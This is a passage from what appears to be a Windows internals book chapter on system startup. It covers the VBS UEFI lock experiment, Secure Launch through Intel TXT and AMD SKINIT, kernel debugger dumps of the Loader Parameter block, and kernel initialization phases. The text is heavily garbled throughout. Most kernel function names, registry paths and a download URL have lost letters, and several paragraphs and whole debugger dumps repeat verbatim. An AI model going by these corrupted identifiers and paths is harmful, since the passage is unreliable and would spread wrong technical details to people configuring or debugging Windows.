the Details tab. Even if it’s already enabled, check that the UEFI lock is enabled. Type Edit Group
policy (or
policy (or
policy
gpeditmsc) in the Start menu search box, and start the Local Policy Group Editor snap-
in. Navigate to Computer Configuration, Administrative Templates, System, Device Guard, and
double-click Turn On Virtualization Based Security. Make sure that the policy is set to Enabled
and that the options are set as in the following figure
CHAPTER 12 Startup and shutdown
815
Make sure that Secure Boot is enabled (you can use the System Information utility or your
system BIOS configuration tool to confirm the Secure Boot activation), and restart the system.
The Enabled With UEFI Lock option provides antitampering even in an Administrator context.
After your system is restarted, disable VBS through the same Group policy editor (make sure that
all the settings are disabled) and by deleting all the registry keys and values located in KE
LOCALMACINESSTEMCurrentControlSetControlDeviceGuard (setting them to 0 produces
the same effect). Use the registry editor to properly delete all the values
Disable the hypervisor by running e/set {current} hypervisorlaunchtype off from
an elevated command prompt. Then restart your computer again. After the system is restarted,
even if VBS and hypervisor are expected to be turned off, you should see that the Secure System
and LsaIso process are still present in the Task Manager. This is because the UEFI secure variable
sly still contains the original policy, so a malicious program or a user could not easily dis-
able the additional layer of protection. To properly confirm this, open the system event viewer by
typing eventvwr and navigate to Windows Logs, System. If you scroll between the events, you
should see the event that describes the VBS activation type (the event has Kernel-Boot source).
Make sure that Secure Boot is enabled (you can use the System Information utility or your
system BIOS configuration tool to confirm the Secure Boot activation), and restart the system.
The Enabled With UEFI Lock option provides antitampering even in an Administrator context.
After your system is restarted, disable VBS through the same Group policy editor (make sure that
all the settings are disabled) and by deleting all the registry keys and values located in KE
LOCALMACINESSTEMCurrentControlSetControlDeviceGuard (setting them to 0 produces
the same effect). Use the registry editor to properly delete all the values
Disable the hypervisor by running e/set {current} hypervisorlaunchtype off from
/set {current} hypervisorlaunchtype off from
/set {current} hypervisorlaunchtype off
an elevated command prompt. Then restart your computer again. After the system is restarted,
even if VBS and hypervisor are expected to be turned off, you should see that the Secure System
and LsaIso process are still present in the Task Manager. This is because the UEFI secure variable
sly still contains the original policy, so a malicious program or a user could not easily dis
sly still contains the original policy, so a malicious program or a user could not easily dis
sly
-
able the additional layer of protection. To properly confirm this, open the system event viewer by
typing eventvwr and navigate to Windows Logs, System. If you scroll between the events, you
should see the event that describes the VBS activation type (the event has Kernel-Boot source).
816
CHAPTER 12 Startup and shutdown
sly is a Boot Services–authenticated UEFI variable, so this means it’s not visible af-
ter the OS switches to Runtime mode. The UefiTool utility, used in the previous experiment, is
not able to show these kinds of variables. To properly examine the ply variable content,
restart your computer again, disable Secure Boot, and use the Efi Shell. The Efi Shell (found
in this book’s downloadable resources, or downloadable from ps//u/nre/
e/ree//elln/efiell/) must be copied into a FAT32 USB stick in a file
named bootx64.efi and located into the efiboot path. At this point, you will be able to boot
from the USB stick, which will launch the Efi Shell. Run the following command
dmpstore VbsPolicy -guid 77FA9ABD-0359-4D32-BD60-28F4E78F784B
( is the GUID of the Secure Boot private namespace.)
The Secure Launch
If Trusted Execution is enabled (through a specific feature value in the VSM policy) and the system
is compatible, Winload enables a new boot path that’s a bit different compared to the normal one.
This new boot path is called Secure Launch. Secure Launch implements the Intel Trusted Boot (TXT)
technology (or SKINIT in AMD64 machines). Trusted Boot is implemented in two components boot
library and the TcbLaunch.exe file. The Boot library, at initialization time, detects that Trusted Boot is
enabled and registers a boot callback that intercepts different events Boot application starting, hash
calculation, and Boot application ending. The Windows loader, in the early stages, executes to the three
stages of Secure Launch Setup (from now on we call the Secure Launch setup the TCB setup) instead of
loading the hypervisor.
As previously discussed, the final goal of Secure Launch is to start a secure boot seuence, where
the CPU is the only root of trust. To do so, the system needs to get rid of all the firmware dependencies.
sly is a Boot Services–authenticated UEFI variable, so this means it’s not visible af
sly is a Boot Services–authenticated UEFI variable, so this means it’s not visible af
sly
-
ter the OS switches to Runtime mode. The UefiTool utility, used in the previous experiment, is
not able to show these kinds of variables. To properly examine the ply variable content,
ply variable content,
ply
restart your computer again, disable Secure Boot, and use the Efi Shell. The Efi Shell (found
in this book’s downloadable resources, or downloadable from ps//u/nre/
e/ree//elln/efiell/) must be copied into a FAT32 USB stick in a file
named bootx64.efi and located into the efiboot path. At this point, you will be able to boot
from the USB stick, which will launch the Efi Shell. Run the following command
dmpstore VbsPolicy -guid 77FA9ABD-0359-4D32-BD60-28F4E78F784B
( is the GUID of the Secure Boot private namespace.)
CHAPTER 12 Startup and shutdown
817
Windows achieves this by creating a RAM disk formatted with the FAT file system, which includes
Winload, the hypervisor, the VSM module, and all the boot OS components needed to start the system.
The windows loader (Winload) reads TcbLaunch.exe from the system boot disk into memory, using
the lppln routine. The latter triggers the three events that the TCB boot callback
manages. The callback first prepares the Measured Launch Environment (MLE) for launch, checking the
ACM modules, ACPI table, and mapping the reuired TXT regions then it replaces the boot application
entry point with a special TXT MLE routine.
The Windows Loader, in the latest stages of the Osleuernsnroutine, doesn’t start the hy-
pervisor launch seuence. Instead, it transfers the execution to the TCB launch seuence, which is uite
simple. The TCB boot application is started with the same lrppln routine described
in the previous paragraph. The modified boot application entry point calls the TXT MLE launch routine,
which executes the GETSEC(SENTER) TXT instruction. This instruction measures the TcbLaunch.exe
executable in memory (TBOOT module) and if the measurement succeeds, the MLE launch routine
transfers the code execution to the real boot application entry point (n).
n function is the first code executed in the Secure Launch environment. The implementa-
tion is simple reinitialize the Boot Library, register an event to receive virtualization launch/resume
notification, and call nry from the Tcbloader.dll module located in the secure RAM disk. The
Tcbloader.dll module is a mini version of the trusted Windows loader. Its goal is to load, verify, and
start the hypervisor set up the ypercall page and launch the Secure Kernel. The Secure Launch at
this stage ends because the hypervisor and Secure Kernel take care of the verification of the NT kernel
and other modules, providing the chain of trust. Execution then returns to the Windows loader, which
moves to the Windows kernel through the standard Oslrrnserernel routine.
Figure 12-10 shows a scheme of Secure Launch and all its involved components. The user can enable
the Secure Launch by using the Local Group policy editor (by tweaking the Turn On Virtualization Based
Security setting, which is under Computer Configuration, Administrative Templates, System, Device Guard).
Bootmgr
Allocates Ramdisk
Reads TcbLaunch
Preload HvLoader, debugger
transports and hypervisor
GETSEC(SENTER)
SINIT ACM measures TcbLaunch
Continue standard
system initialization
(load Nt Kernel, Boot
drivers, …)
Preload Secure Kernel
PHASE 0
PHASE 1
LAUNCH
Winload
Winload
Secure Kernel
Nt Kernel
Hypervisor
TcbLaunch
Prepare the MLE
Load SINIT ACM
Verifies Winload
and Nt Kernel
Verifies
hypervisor and
Secure Kernel
FIGURE 12-10 The Secure Launch scheme. Note that the hypervisor and Secure Kernel start from the RAM disk.
818
CHAPTER 12 Startup and shutdown
Note The ACM modules of Trusted Boot are provided by Intel and are chipset-dependent.
Most of the TXT interface is memory mapped in physical memory. This means that the v
Loader can access even the SINIT region, verify the SINIT ACM version, and update it if need-
ed. Windows achieves this by using a special compressed WIM file (called Tcbres.wim) that
contains all the known SINIT ACM modules for each chipset. If needed, the MLE preparation
phase opens the compressed file, extracts the right binary module, and replaces the contents
of the original SINIT firmware in the TXT region. When the Secure Launch procedure is in-
voked, the CPU loads the SINIT ACM into secure memory, verifies the integrity of the digital
signature, and compares the hash of its public key with the one hardcoded into the chipset.
Secure Launch on AMD platforms
Although Secure Launch is supported on Intel machines thanks to TXT, the Windows 10 Spring 2020
update also supports SKINIT, which is a similar technology designed by AMD for the verifiable startup
of trusted software, starting with an initially untrusted operating mode.
SKINIT has the same goal as Intel TXT and is used for the Secure Launch boot flow. It’s different
from the latter, though The base of SKINIT is a small type of software called secure loader (SL), which in
Windows is implemented in the amdsl.bin binary included in the resource section of the Amddrtm.dll
library provided by AMD. The SKINIT instruction reinitializes the processor to establish a secure execu-
tion environment and starts the execution of the SL in a way that can’t be tampered with. The secure
loader lives in the Secure Loader Block, a 64-Kbyte structure that is transferred to the TPM by the
SKINIT instruction. The TPM measures the integrity of the SL and transfers execution to its entry point.
The SL validates the system state, extends measurements into the PCR, and transfers the execution
to the AMD MLE launch routine, which is located in a separate binary included in the TcbLaunch.exe
module. The MLE routine initializes the IDT and GDT and builds the page table for switching the pro-
cessor to long mode. (The MLE in AMD machines are executed in 32-bit protected mode, with a goal
of keeping the code in the TCB as small as possible.) It finally jumps back in the TcbLaunch, which, as for
Intel systems, reinitializes the Boot Library, registers an event to receive virtualization launch/resume no-
tification, and calls nry from the tcbloader.dll module. From now on, the boot flow is identical
to the Secure Launch implementation for the Intel systems.
Initializing the kernel and executive subsystems
When Winload calls Ntoskrnl, it passes a data structure called the Loader Parameter block. The Loader
Parameter block contains the system and boot partition paths, a pointer to the memory tables Winload
generated to describe the system physical memory, a physical hardware tree that is later used to build
the volatile ARDWARE registry hive, an in-memory copy of the SSTEM registry hive, and a pointer to
the list of boot drivers Winload loaded. It also includes various other information related to the boot
processing performed until this point.
CHAPTER 12 Startup and shutdown
819
EXPERIMENT: Loader Parameter block
While booting, the kernel keeps a pointer to the Loader Parameter block in the eerl
variable. The kernel discards the parameter block after the first boot phase, so the only way to
see the contents of the structure is to attach a kernel debugger before booting and break at the
initial kernel debugger breakpoint. If you’re able to do so, you can use the dt command to dump
the block, as shown
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK
+0x000 OsMajorVersion : 0xa
+0x004 OsMinorVersion : 0
+0x008 Size
: 0x160
+0x00c OsLoaderSecurityVersion : 1
+0x010 LoadOrderListHead : _LIST_ENTRY [ 0xfffff800`2278a230 - 0xfffff800`2288c150 ]
+0x020 MemoryDescriptorListHead : _LIST_ENTRY [ 0xfffff800`22949000 - 0xfffff800`22949de8 ]
+0x030 BootDriverListHead : _LIST_ENTRY [ 0xfffff800`22840f50 - 0xfffff800`2283f3e0 ]
+0x040 EarlyLaunchListHead : _LIST_ENTRY [ 0xfffff800`228427f0 - 0xfffff800`228427f0 ]
+0x050 CoreDriverListHead : _LIST_ENTRY [ 0xfffff800`228429a0 - 0xfffff800`228405a0 ]
+0x060 CoreExtensionsDriverListHead : _LIST_ENTRY [ 0xfffff800`2283ff20 - 0xfffff800`22843090 ]
+0x070 TpmCoreDriverListHead : _LIST_ENTRY [ 0xfffff800`22831ad0 - 0xfffff800`22831ad0 ]
+0x080 KernelStack : 0xfffff800`25f5e000
+0x088 Prcb
: 0xfffff800`22acf180
+0x090 Process
: 0xfffff800`23c819c0
+0x098 Thread
: 0xfffff800`23c843c0
+0x0a0 KernelStackSize : 0x6000
+0x0a4 RegistryLength : 0xb80000
+0x0a8 RegistryBase : 0xfffff800`22b49000 Void
+0x0b0 ConfigurationRoot : 0xfffff800`22783090 _CONFIGURATION_COMPONENT_DATA
+0x0b8 ArcBootDeviceName : 0xfffff800`22785290 "multi(0)disk(0)rdisk(0)partition(4)"
+0x0c0 ArcHalDeviceName : 0xfffff800`22785190 "multi(0)disk(0)rdisk(0)partition(2)"
+0x0c8 NtBootPathName : 0xfffff800`22785250 "\WINDOWS\"
+0x0d0 NtHalPathName : 0xfffff800`22782bd0 "\"
+0x0d8 LoadOptions : 0xfffff800`22772c80 "KERNEL=NTKRNLMP.EXE NOEXECUTE=OPTIN
HYPERVISORLAUNCHTYPE=AUTO DEBUG ENCRYPTION_KEY=**** DEBUGPORT=NET
HOST_IP=192.168.18.48 HOST_PORT=50000 NOVGA"
+0x0e0 NlsData
: 0xfffff800`2277a450 _NLS_DATA_BLOCK
+0x0e8 ArcDiskInformation : 0xfffff800`22785e30 _ARC_DISK_INFORMATION
+0x0f0 Extension
: 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
+0x0f8 u
: <unnamed-tag>
+0x108 FirmwareInformation : _FIRMWARE_INFORMATION_LOADER_BLOCK
+0x148 OsBootstatPathName : (null)
+0x150 ArcOSDataDeviceName : (null)
+0x158 ArcWindowsSysPartName : (null)
Additionally, you can use the !loadermemorylist command on the eryesrprse
field to dump the physical memory ranges
kd> !loadermemorylist 0xfffff800`22949000
Base Length Type
0000000001 0000000005 (26) HALCachedMemory
( 20 Kb )
0000000006 000000009a ( 5) FirmwareTemporary ( 616 Kb )
...
EXPERIMENT: Loader Parameter block
While booting, the kernel keeps a pointer to the Loader Parameter block in the eerl
variable. The kernel discards the parameter block after the first boot phase, so the only way to
see the contents of the structure is to attach a kernel debugger before booting and break at the
initial kernel debugger breakpoint. If you’re able to do so, you can use the dt command to dump
the block, as shown
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK
+0x000 OsMajorVersion : 0xa
+0x004 OsMinorVersion : 0
+0x008 Size
: 0x160
+0x00c OsLoaderSecurityVersion : 1
+0x010 LoadOrderListHead : _LIST_ENTRY [ 0xfffff800`2278a230 - 0xfffff800`2288c150 ]
+0x020 MemoryDescriptorListHead : _LIST_ENTRY [ 0xfffff800`22949000 - 0xfffff800`22949de8 ]
+0x030 BootDriverListHead : _LIST_ENTRY [ 0xfffff800`22840f50 - 0xfffff800`2283f3e0 ]
+0x040 EarlyLaunchListHead : _LIST_ENTRY [ 0xfffff800`228427f0 - 0xfffff800`228427f0 ]
+0x050 CoreDriverListHead : _LIST_ENTRY [ 0xfffff800`228429a0 - 0xfffff800`228405a0 ]
+0x060 CoreExtensionsDriverListHead : _LIST_ENTRY [ 0xfffff800`2283ff20 - 0xfffff800`22843090 ]
+0x070 TpmCoreDriverListHead : _LIST_ENTRY [ 0xfffff800`22831ad0 - 0xfffff800`22831ad0 ]
+0x080 KernelStack : 0xfffff800`25f5e000
+0x088 Prcb
: 0xfffff800`22acf180
+0x090 Process
: 0xfffff800`23c819c0
+0x098 Thread
: 0xfffff800`23c843c0
+0x0a0 KernelStackSize : 0x6000
+0x0a4 RegistryLength : 0xb80000
+0x0a8 RegistryBase : 0xfffff800`22b49000 Void
+0x0b0 ConfigurationRoot : 0xfffff800`22783090 _CONFIGURATION_COMPONENT_DATA
+0x0b8 ArcBootDeviceName : 0xfffff800`22785290 "multi(0)disk(0)rdisk(0)partition(4)"
+0x0c0 ArcHalDeviceName : 0xfffff800`22785190 "multi(0)disk(0)rdisk(0)partition(2)"
+0x0c8 NtBootPathName : 0xfffff800`22785250 "\WINDOWS\"
+0x0d0 NtHalPathName : 0xfffff800`22782bd0 "\"
+0x0d8 LoadOptions : 0xfffff800`22772c80 "KERNEL=NTKRNLMP.EXE NOEXECUTE=OPTIN
HYPERVISORLAUNCHTYPE=AUTO DEBUG ENCRYPTION_KEY=**** DEBUGPORT=NET
HOST_IP=192.168.18.48 HOST_PORT=50000 NOVGA"
+0x0e0 NlsData
: 0xfffff800`2277a450 _NLS_DATA_BLOCK
+0x0e8 ArcDiskInformation : 0xfffff800`22785e30 _ARC_DISK_INFORMATION
+0x0f0 Extension
: 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
+0x0f8 u
: <unnamed-tag>
+0x108 FirmwareInformation : _FIRMWARE_INFORMATION_LOADER_BLOCK
+0x148 OsBootstatPathName : (null)
+0x150 ArcOSDataDeviceName : (null)
+0x158 ArcWindowsSysPartName : (null)
Additionally, you can use the !loadermemorylist command on the eryesrprse
field to dump the physical memory ranges
kd> !loadermemorylist 0xfffff800`22949000
Base Length Type
0000000001 0000000005 (26) HALCachedMemory
( 20 Kb )
0000000006 000000009a ( 5) FirmwareTemporary ( 616 Kb )
...
820
CHAPTER 12 Startup and shutdown
0000001304 0000000001 ( 7) OsloaderHeap
( 4 Kb )
0000001305 0000000081 ( 5) FirmwareTemporary ( 516 Kb )
0000001386 000000001c (20) MemoryData
( 112 Kb )
...
0000001800 0000000b80 (19) RegistryData
( 11 Mb 512 Kb )
0000002380 00000009fe ( 9) SystemCode
( 9 Mb 1016 Kb )
0000002d7e 0000000282 ( 2) Free
( 2 Mb 520 Kb )
0000003000 0000000391 ( 9) SystemCode
( 3 Mb 580 Kb )
0000003391 0000000068 (11) BootDriver
( 416 Kb )
00000033f9 0000000257 ( 2) Free
( 2 Mb 348 Kb )
0000003650 00000008d2 ( 5) FirmwareTemporary ( 8 Mb 840 Kb )
000007ffc9 0000000026 (31) FirmwareData
( 152 Kb )
000007ffef 0000000004 (32) FirmwareReserved ( 16 Kb )
000007fff3 000000000c ( 6) FirmwarePermanent ( 48 Kb )
000007ffff 0000000001 ( 5) FirmwareTemporary ( 4 Kb )
NumberOfDescriptors: 90
Summary
Memory Type
Pages
Free
000007a89c ( 501916) ( 1 Gb 936 Mb 624 Kb )
LoadedProgram
0000000370 ( 880)
( 3 Mb 448 Kb )
FirmwareTemporary 0000001fd4 ( 8148) ( 31 Mb 848 Kb )
FirmwarePermanent 000000030e ( 782)
( 3 Mb 56 Kb )
OsloaderHeap
0000000275 ( 629)
( 2 Mb 468 Kb )
SystemCode
0000001019 ( 4121) ( 16 Mb 100 Kb )
BootDriver
000000115a ( 4442) ( 17 Mb 360 Kb )
RegistryData
0000000b88 ( 2952) ( 11 Mb 544 Kb )
MemoryData
0000000098 ( 152)
( 608 Kb )
NlsData
0000000023 ( 35)
( 140 Kb )
HALCachedMemory 0000000005 ( 5)
( 20 Kb )
FirmwareCode
0000000008 ( 8)
( 32 Kb )
FirmwareData
0000000075 ( 117)
( 468 Kb )
FirmwareReserved 0000000044 ( 68)
( 272 Kb )
========== ==========
Total
000007FFDF ( 524255) = ( ~2047 Mb )
The Loader Parameter extension can show useful information about the system hardware,
CPU features, and boot type
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK Extension
+0x0f0 Extension : 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
kd> dt 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
nt!_LOADER_PARAMETER_EXTENSION
+0x000 Size
: 0xc48
+0x004 Profile
: _PROFILE_PARAMETER_BLOCK
+0x018 EmInfFileImage : 0xfffff800`25f2d000 Void
...
+0x068 AcpiTable
: (null)
+0x070 AcpiTableSize : 0
+0x074 LastBootSucceeded : 0y1
+0x074 LastBootShutdown : 0y1
+0x074 IoPortAccessSupported : 0y1
+0x074 BootDebuggerActive : 0y0
+0x074 StrongCodeGuarantees : 0y0
+0x074 HardStrongCodeGuarantees : 0y0
+0x074 SidSharingDisabled : 0y0
0000001304 0000000001 ( 7) OsloaderHeap
( 4 Kb )
0000001305 0000000081 ( 5) FirmwareTemporary ( 516 Kb )
0000001386 000000001c (20) MemoryData
( 112 Kb )
...
0000001800 0000000b80 (19) RegistryData
( 11 Mb 512 Kb )
0000002380 00000009fe ( 9) SystemCode
( 9 Mb 1016 Kb )
0000002d7e 0000000282 ( 2) Free
( 2 Mb 520 Kb )
0000003000 0000000391 ( 9) SystemCode
( 3 Mb 580 Kb )
0000003391 0000000068 (11) BootDriver
( 416 Kb )
00000033f9 0000000257 ( 2) Free
( 2 Mb 348 Kb )
0000003650 00000008d2 ( 5) FirmwareTemporary ( 8 Mb 840 Kb )
000007ffc9 0000000026 (31) FirmwareData
( 152 Kb )
000007ffef 0000000004 (32) FirmwareReserved ( 16 Kb )
000007fff3 000000000c ( 6) FirmwarePermanent ( 48 Kb )
000007ffff 0000000001 ( 5) FirmwareTemporary ( 4 Kb )
NumberOfDescriptors: 90
Summary
Memory Type
Pages
Free
000007a89c ( 501916) ( 1 Gb 936 Mb 624 Kb )
LoadedProgram
0000000370 ( 880)
( 3 Mb 448 Kb )
FirmwareTemporary 0000001fd4 ( 8148) ( 31 Mb 848 Kb )
FirmwarePermanent 000000030e ( 782)
( 3 Mb 56 Kb )
OsloaderHeap
0000000275 ( 629)
( 2 Mb 468 Kb )
SystemCode
0000001019 ( 4121) ( 16 Mb 100 Kb )
BootDriver
000000115a ( 4442) ( 17 Mb 360 Kb )
RegistryData
0000000b88 ( 2952) ( 11 Mb 544 Kb )
MemoryData
0000000098 ( 152)
( 608 Kb )
NlsData
0000000023 ( 35)
( 140 Kb )
HALCachedMemory 0000000005 ( 5)
( 20 Kb )
FirmwareCode
0000000008 ( 8)
( 32 Kb )
FirmwareData
0000000075 ( 117)
( 468 Kb )
FirmwareReserved 0000000044 ( 68)
( 272 Kb )
========== ==========
Total
000007FFDF ( 524255) = ( ~2047 Mb )
The Loader Parameter extension can show useful information about the system hardware,
CPU features, and boot type
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK Extension
+0x0f0 Extension : 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
kd> dt 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
nt!_LOADER_PARAMETER_EXTENSION
+0x000 Size
: 0xc48
+0x004 Profile
: _PROFILE_PARAMETER_BLOCK
+0x018 EmInfFileImage : 0xfffff800`25f2d000 Void
...
+0x068 AcpiTable
: (null)
+0x070 AcpiTableSize : 0
+0x074 LastBootSucceeded : 0y1
+0x074 LastBootShutdown : 0y1
+0x074 IoPortAccessSupported : 0y1
+0x074 BootDebuggerActive : 0y0
+0x074 StrongCodeGuarantees : 0y0
+0x074 HardStrongCodeGuarantees : 0y0
+0x074 SidSharingDisabled : 0y0
CHAPTER 12 Startup and shutdown
821
+0x074 TpmInitialized : 0y0
+0x074 VsmConfigured : 0y0
+0x074 IumEnabled
: 0y0
+0x074 IsSmbboot
: 0y0
+0x074 BootLogEnabled : 0y0
+0x074 FeatureSettings : 0y0000000 (0)
+0x074 FeatureSimulations : 0y000000 (0)
+0x074 MicrocodeSelfHosting : 0y0
...
+0x900 BootFlags
: 0
+0x900 DbgMenuOsSelection : 0y0
+0x900 DbgHiberBoot : 0y1
+0x900 DbgSoftRestart : 0y0
+0x908 InternalBootFlags : 2
+0x908 DbgUtcBootTime : 0y0
+0x908 DbgRtcBootTime : 0y1
+0x908 DbgNoLegacyServices : 0y0
Ntoskrnl then begins phase 0, the first of its two-phase initialization process (phase 1 is the second).
Most executive subsystems have an initialization function that takes a parameter that identifies which
phase is executing.
During phase 0, interrupts are disabled. The purpose of this phase is to build the rudimentary
structures reuired to allow the services needed in phase 1 to be invoked. Ntoskrnl’s startup func-
tion, yserup, is called in each system processor context (more details later in this chapter
in the Kernel initialization phase 1 section). It initializes the processor boot structures and sets up a
Global Descriptor Table (GDT) and Interrupt Descriptor Table (IDT). If called from the boot processor,
the startup routine initializes the Control Flow Guard (CFG) check functions and cooperates with the
memory manager to initialize KASLR. The KASLR initialization should be done in the early stages of
the system startup in this way, the kernel can assign random VA ranges for the various virtual memory
regions (such as the PFN database and system PTE regions more details about KASLR are available
in the Image randomization section of Chapter 5, Part 1). yserup also initializes the kernel
debugger, the XSAVE processor area, and, where needed, KVA Shadow. It then calls nleernel.
If nleernel is running on the boot CPU, it performs systemwide kernel initialization, such as
initializing internal lists and other data structures that all CPUs share. It builds and compacts the System
Service Descriptor table (SSDT) and calculates the random values for the internal lys and
eer values, which are used for kernel pointers encoding. It also checks whether virtualization
has been started if it has, it maps the ypercall page and starts the processor’s enlightenments (more
details about the hypervisor enlightenments are available in Chapter 9).
nleernel, if executed by compatible processors, has the important role of initializing and
enabling the Control Enforcement Technology (CET). This hardware feature is relatively new, and basi-
cally implements a hardware shadow stack, used to detect and prevent ROP attacks. The technology
is used for protecting both user-mode applications as well as kernel-mode drivers (only when VSM
is available). nleernel initializes the Idle process and thread and calls pnleeue.
nleernel and pnleeue are normally executed on each system processor. When
+0x074 TpmInitialized : 0y0
+0x074 VsmConfigured : 0y0
+0x074 IumEnabled
: 0y0
+0x074 IsSmbboot
: 0y0
+0x074 BootLogEnabled : 0y0
+0x074 FeatureSettings : 0y0000000 (0)
+0x074 FeatureSimulations : 0y000000 (0)
+0x074 MicrocodeSelfHosting : 0y0
...
+0x900 BootFlags
: 0
+0x900 DbgMenuOsSelection : 0y0
+0x900 DbgHiberBoot : 0y1
+0x900 DbgSoftRestart : 0y0
+0x908 InternalBootFlags : 2
+0x908 DbgUtcBootTime : 0y0
+0x908 DbgRtcBootTime : 0y1
+0x908 DbgNoLegacyServices : 0y0
822
CHAPTER 12 Startup and shutdown
executed by the boot processor, pnleeue relies on the function responsible for orchestrat-
ing phase 0, nressr, while subsequent processors call only nOerressrs.
Note Return-oriented programming (ROP) is an exploitation techniue in which an attacker
gains control of the call stack of a program with the goal of hijacking its control flow and
executes carefully chosen machine instruction sequences, called “gadgets,” that are already
present in the machine’s memory. Chained together, multiple gadgets allow an attacker to
perform arbitrary operations on a machine.
nressr starts by validating the boot loader. If the boot loader version used to launch
Windows doesn’t correspond to the right Windows kernel, the function crashes the system with a
OO bugcheck code (0x100). Otherwise, it initializes the pool look-aside point-
ers for the initial CPU and checks for and honors the BCD urnery boot option, where it discards
the amount of physical memory the value specifies. It then performs enough initialization of the NLS
files that were loaded by Winload (described earlier) to allow Unicode to ANSI and OEM translation
to work. Next, it continues by initializing Windows ardware Error Architecture (WEA) and calling
the AL function lnyse, which gives the AL a chance to gain system control before Windows
performs significant further initialization. lnyse is responsible for initializing and starting vari-
ous components of the AL, like ACPI tables, debugger descriptors, DMA, firmware, I/O MMU, System
Timers, CPU topology, performance counters, and the PCI bus. One important duty of lnyse is
to prepare each CPU interrupt controller to receive interrupts and to configure the interval clock timer
interrupt, which is used for CPU time accounting. (See the section Quantum in Chapter 4, Threads,
in Part 1 for more on CPU time accounting.)
When lnyse exits, nressr proceeds by computing the reciprocal for clock timer
expiration. Reciprocals are used for optimizing divisions on most modern processors. They can perform
multiplications faster, and because Windows must divide the current 64-bit time value in order to find
out which timers need to expire, this static calculation reduces interrupt latency when the clock interval
fires. nressr uses a helper routine, nyse, to fetch registry values from the control
vector of the SSTEM hive. This data structure contains more than 150 kernel-tuning options that are
part of the KLMSSTEMCurrentControlSetControl registry key, including information such as the
licensing data and version information for the installation. All the settings are preloaded and stored
in global variables. nressr then continues by setting up the system root path and search-
ing into the kernel image to find the crash message strings it displays on blue screens, caching their
location to avoid looking them up during a crash, which could be dangerous and unreliable. Next,
nressr initializes the timer subsystem and the shared user data page.
nressr is now ready to call the phase 0 initialization routines for the executive, Driver
Verifier, and the memory manager. These components perform the following initialization tasks
1.
The executive initializes various internal locks, resources, lists, and variables and validates that
the product suite type in the registry is valid, discouraging casual modification of the registry to
upgrade to an SKU of Windows that was not actually purchased. This is only one of the many
such checks in the kernel.
CHAPTER 12 Startup and shutdown
823
2.
Driver Verifier, if enabled, initializes various settings and behaviors based on the current state of
the system (such as whether safe mode is enabled) and verification options. It also picks which
drivers to target for tests that target randomly chosen drivers.
3.
The memory manager constructs the page tables, PFN database, and internal data structures
that are necessary to provide basic memory services. It also enforces the limit of the maximum
supported amount of physical memory and builds and reserves an area for the system file
cache. It then creates memory areas for the paged and nonpaged pools (described in Chapter
5 in Part 1). Other executive subsystems, the kernel, and device drivers use these two memory
pools for allocating their data structures. It finally creates the UltraSpace, a 16 TB region that
provides support for fast and inexpensive page mapping that doesn’t reuire TLB flushing.
Next, nressr enables the hypervisor CPU dynamic partitioning (if enabled and correctly
licensed), and calls lnles to set up the old BIOS emulation code part of the AL. This code is
used to allow access (or to emulate access) to 16-bit real mode interrupts and memory, which are used
mainly by Bootvid (this driver has been replaced by BGFX but still exists for compatibility reasons).
At this point, nressr enumerates the boot-start drivers that were loaded by Winload
and calls eyls to inform the kernel debugger (if attached) to load symbols for
each of these drivers. If the host debugger has configured the break on symbol load option, this will
be the earliest point for a kernel debugger to gain control of the system. nressr now calls
lsenle, which performs the remaining VL initialization that hasn’t been possible to com-
plete in previous phases. When the function returns, it calls elessn to initialize the serial console if
the machine was configured for Emergency Management Services (EMS).
Next, nressr builds the versioning information that will be used later in the boot process,
such as the build number, service pack version, and beta version status. Then it copies the NLS tables
that Winload previously loaded into the paged pool, reinitializes them, and creates the kernel stack
trace database if the global flags specify creating one. (For more information on the global flags, see
Chapter 6, I/O system, in Part 1.)
Finally, nressr calls the object manager, security reference monitor, process manager,
user-mode debugging framework, and Plug and Play manager. These components perform the follow-
ing initialization steps
1.
During the object manager initialization, the objects that are necessary to construct the object
manager namespace are defined so that other subsystems can insert objects into it. The system
process and the global kernel handle tables are created so that resource tracking can begin.
The value used to encrypt the object header is calculated, and the Directory and SymbolicLink
object types are created.
2.
The security reference monitor initializes security global variables (like the system SIDs and
Privilege LUIDs) and the in-memory database, and it creates the token type object. It then cre-
ates and prepares the first local system account token for assignment to the initial process. (See
Chapter 7 in Part 1 for a description of the local system account.)
3.
The process manager performs most of its initialization in phase 0, defining the process, thread,
job, and partition object types and setting up lists to track active processes and threads. The
824
CHAPTER 12 Startup and shutdown
systemwide process mitigation options are initialized and merged with the options specified
in the KLMSSTEMCurrentControlSetControlSession ManagerKernelMitigationOptions
registry value. The process manager then creates the executive system partition object, which
is called MemoryPartition0. The name is a little misleading because the object is actually an
executive partition object, a new Windows object type that encapsulates a memory partition
and a cache manager partition (for supporting the new application containers).
4.
The process manager also creates a process object for the initial process and names it idle. As
its last step, the process manager creates the System protected process and a system thread to
execute the routine senln. This thread doesn’t start running right away because
interrupts are still disabled. The System process is created as protected to get protection from
user mode attacks, because its virtual address space is used to map sensitive data used by the
system and by the Code Integrity driver. Furthermore, kernel handles are maintained in the system
process’s handle table.
5.
The user-mode debugging framework creates the definition of the debug object type that is
used for attaching a debugger to a process and receiving debugger events. For more informa-
tion on user-mode debugging, see Chapter 8, System mechanisms.
6.
The Plug and Play manager’s phase 0 initialization then takes place, which involves initializing
an executive resource used to synchronize access to bus resources.
When control returns to nleernel, the last step is to allocate the DPC stack for the current
processor, raise the IRQL to dispatch level, and enable the interrupts. Then control proceeds to the Idle
loop, which causes the system thread created in step 4 to begin executing phase 1. (Secondary proces-
sors wait to begin their initialization until step 11 of phase 1, which is described in the following list.)
Kernel initialization phase 1
As soon as the Idle thread has a chance to execute, phase 1 of kernel initialization begins. Phase 1
consists of the following steps
1.
senlnsr, as the name implies, discards the code that is part of the INIT sec-
tion of the kernel image in order to preserve memory.
2.
The initialization thread sets its priority to 31, the highest possible, to prevent preemption.
3.
The BCD option that specifies the maximum number of virtual processors (hypervisorrootproc)
is evaluated.
4.
